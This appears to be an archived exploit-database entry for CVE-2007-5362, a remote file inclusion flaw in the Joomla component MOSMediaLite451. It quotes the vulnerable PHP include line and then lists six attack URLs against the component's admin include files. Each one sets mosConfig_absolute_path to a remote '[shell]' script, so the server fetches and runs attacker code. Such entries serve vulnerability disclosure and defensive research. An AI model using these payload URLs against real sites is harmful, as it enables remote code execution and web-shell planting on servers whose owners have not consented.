Joomla! Component mosmedialite451 - Remote File Inclusion

Author: k1n9k0ng
type: webapps
platform: php
port: 
date_added: 2007-10-07 
date_updated: 2016-10-12 
verified: 1 
codes: CVE-2007-5362 
tags: 
aliases:  
screenshot_url:  
application_url: 

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Scripts         : MOSMediaLite451
Discovered By   : k1n9k0ng
Scripts site    : http://www.djoomla.com/component/option,com_remository/Itemid,2/func,fileinfo/id,104/
Thanks To       : #sekuritionline, #semprol, #bajingan, #mimid, #r.i.p, #x-code, #yogyafree
special To      : adhietslank, babypunk, cyberlog, cah_gemblunkz, the_sims, ARiee, letjen, k1tk4t
site            : www.sekuritionline.net
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

bug Script:
include_once( $mosConfig_absolute_path . "/administrator/components/com_mosmedia/mosmedia.config.php" );

bug found:
"http://www.site.net/administrator/components/com_mosmedia/includes/credits.html.php?mosConfig_absolute_path=[shell] "
"http://www.site.net/administrator/components/com_mosmedia/includes/info.html.php?mosConfig_absolute_path=[shell] "
"http://www.site.net/administrator/components/com_mosmedia/includes/media.divs.php?mosConfig_absolute_path=[shell] "
"http://www.site.net/administrator/components/com_mosmedia/includes/media.divs.js.php?mosConfig_absolute_path=[shell] "
"http://www.site.net/administrator/components/com_mosmedia/includes/purchase.html.php?mosConfig_absolute_path=[shell] "
"http://www.site.net/administrator/components/com_mosmedia/includes/support.html.php?mosConfig_absolute_path=[shell] "

# milw0rm.com [2007-10-08]